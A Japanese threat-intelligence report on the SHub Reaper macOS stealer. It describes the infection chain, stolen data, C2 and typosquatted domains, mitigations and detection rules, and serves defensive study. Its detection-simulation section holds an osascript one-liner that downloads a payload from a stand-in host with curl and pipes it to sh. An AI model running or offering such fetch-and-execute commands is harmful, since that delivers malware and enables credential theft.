SHub Reaper | macOS スティーラーによるApple、Google、Microsoftを一度に偽装する攻撃チェーン
Detection stack
- AIDR
- Alert
- ETL
- Query
サマリー
このレポートは、SHub Reaperと呼ばれる新しいmacOS情報スティーラーのバリアントを分析しており、タイポスクワットされたMicrosoftをテーマにしたドメインを通じて悪意のあるAppleScriptペイロードを配信するために偽のWeChatおよびMiroインストーラを使用しています。Script Editorで起動されると、ペイロードはブラウザーデータ、暗号通貨ウォレットファイル、キーチェーン情報を収集し、ストールンコンテンツをチャンク化されたZIPアーカイブとして流出させます。マルウェアはまた、ウォレットファイルをいじり、Googleソフトウェアのアップデートに偽装したLaunchAgentを通じて持続性を確立します。推奨される検出は、AppleScriptの実行、疑わしいLaunchAgentの作成、および既知のコマンド&コントロールインフラストラクチャへのアウトバウンドトラフィックに焦点を当てています。
調査
SentinelOneは、悪用された applescript:// スキーム、AppleScriptペイロードの動的生成、およびAMOSで見られるドキュメント盗難行為を反映したファイルグラビングモジュールを含むフルマルチステージ配信チェーンを追跡しました。研究者は、コマンド&コントロールドメインへのネットワークトラフィックをキャプチャしました hebsbsbzjsjshduxbs.xyz および関連するエンドポイントに加え、ユーザーのライブラリディレクトリに配置された一時ファイル及びLaunchAgentの作成を発見しました。この調査では、オペレーターのテレメトリーに使用されるハードコーディングされたTelegramボットの機能も明らかにされました。 /tmp and a LaunchAgent placed in the user’s Library directory. The investigation also uncovered hard-coded Telegram bot functionality used for operator telemetry.
緩和策
防御者は、タイポスクワットされたドメイン mlcrosoft.co.com, qq-0732gwh22.com、そして mlroweb.comへのアクセスをブロックし、Googleのアップデートコンポーネントを模したパスに作成されたLaunchAgentを監視すべきです。アプリケーションの許可リストを使用して、信頼されていないソースからのAppleScriptの実行を制限し、厳格なコード署名検証を実施する必要があります。ネットワーク検出も、特定のコマンド&コントロールドメインおよびその既知のAPIパスとの通信に警告を出すべきです。
レスポンス
SHub Reaperの活動が検出された場合、影響を受けるエンドポイントを直ちに隔離し、疑わしいAppleScriptまたはLaunchAgentプロセスを終了し、から悪意のあるファイルを削除します /tmp およびユーザーライブラリ。その後、調査者はブラウザーデータストア、ウォレットディレクトリ、およびクレデンシャルリポジトリの完全なフォレンジックコレクションを行い、妥協が疑われる場合はクレデンシャルのリセットを行います。特定されたコマンド&コントロールインフラはブロックされ、インシデントレスポンステームは環境全体でより広範囲な脅威ハンティングを開始すべきです。
攻撃フロー
検出
可能なIPルックアップドメイン通信試行(DNS経由)
表示
変更されたアプリケーションバンドルの強制コード署名(コマンドライン経由)
表示
疑わしいディレクトリを指すMacOSアーカイブユーティリティ(コマンドライン経由)
表示
疑わしいCurl実行試行【MacOS】(コマンドライン経由)
表示
MacOS一時フォルダ内に作成されたアーカイブ(ファイルイベント経由)
表示
可能性のあるBase64エンコード文字列操作(コマンドライン経由)
表示
IOC(ハッシュSha256)で検出:SHub Reaper | macOSスティーラーがApple、Google、Microsoftを模倣した単一の攻撃チェーン
表示
IOC(ハッシュMd5)で検出:SHub Reaper | macOSスティーラーがApple、Google、Microsoftを模倣した単一の攻撃チェーン
表示
タイポスクワットおよびC2ドメインを使用したSHub Reaper感染チェーンの検出【Webサーバー】
表示
AppleScriptとCurlによるSHub Reaperマルウェア実行の検出【Linuxプロセス生成】
表示
シミュレーション実行
前提条件: テレメトリーおよびベースライン事前飛行チェックが合格していること。
根拠: このセクションは、検出ルールを起動するためにデザインされた敵対者技術(TTP)の正確な実行を詳述しています。コマンドとナラティブはTTPに直接反映され、検出ロジックが期待する正確なテレメトリーを生成することを目的としています。抽象的または無関係な例は誤診を引き起こします。
-
攻撃概要とコマンド:
攻撃者は一行でosascriptを利用してシェルコマンドを実行する一行のスクリプトを作成。AppleScript内でシェルスクリプトを実行として使用しますcurlはリモートシェルスクリプト(payload.sh)をダウンロードし、それを直接shにパイプして実行します。AppleScript呼び出し全体が単一の中に埋め込まれているため、macOSは単一のプロセス生成イベントとして記録し、そのコマンドラインにはosascriptandcurlが含まれており、検出ルールを満たしている。 -
回帰テストスクリプト:
#!/bin/bash # # macOSでSHub Reaperの実行をシミュレート # 'osascript'と'curl'を両方含む単一のプロセス生成イベントを生成 # MALICIOUS_URL="https://malicious.example.com/payload.sh" # ワンライナー: osascriptがペイロードをcurlして実行するシェルコマンドを実行 osascript -e "do shell script "curl -s ${MALICIOUS_URL} | sh"" -
クリーンアップコマンド:
#!/bin/bash # # シミュレーションで作成されたアーティファクトをクリーンアップ。 # ペイロードはメモリ上で実行され、ファイルを書き込みませんが、残存プロセスがないようにします。 # # テストにより開始された 'sh' プロセスを終了(本番システムでの使用には注意) pkill -f "sh -c curl -s https://malicious.example.com/payload.sh"